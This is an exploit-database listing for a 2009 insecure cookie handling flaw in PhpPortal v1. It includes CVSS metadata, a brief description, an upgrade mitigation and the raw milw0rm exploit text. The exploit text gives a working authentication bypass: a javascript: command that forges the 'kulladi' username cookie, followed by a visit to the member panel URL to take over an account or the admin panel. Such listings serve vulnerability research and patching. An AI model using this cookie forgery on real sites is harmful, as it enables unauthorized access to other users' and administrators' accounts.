header-logo
Suggest Exploit
vendor:
Phportal
by:
KnocKout
7,5
CVSS
HIGH
Insecure Cookie Handling
614
CWE
Product Name: Phportal
Affected Version From: v1
Affected Version To: v1
Patch Exists: YES
Related CWE: N/A
CPE: a:phportal:phportal
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

PhpPortal v1 Insecure Cookie Handling Vulnerability

PhpPortal v1 is prone to an insecure cookie handling vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to gain access to the administrator panel.

Mitigation:

Upgrade to the latest version of PhpPortal.
Source

Exploit-DB raw data:

########################################################
PhpPortal v1 Insecure Cookie Handling Vulnerability
########################################################

Author : KnocKout
Special Thankz : CW All users
Script : http://phportal.mertindualari.com

########################################################

Exploit;

javascript:document.cookie="kulladi=[Username];path=/";
Enter..

Go To; http://target.com/uye_paneli.php?islem=bilgilerim


########################################################

# milw0rm.com [2009-06-17]

Navigation

Suggest Exploit

Services By CQR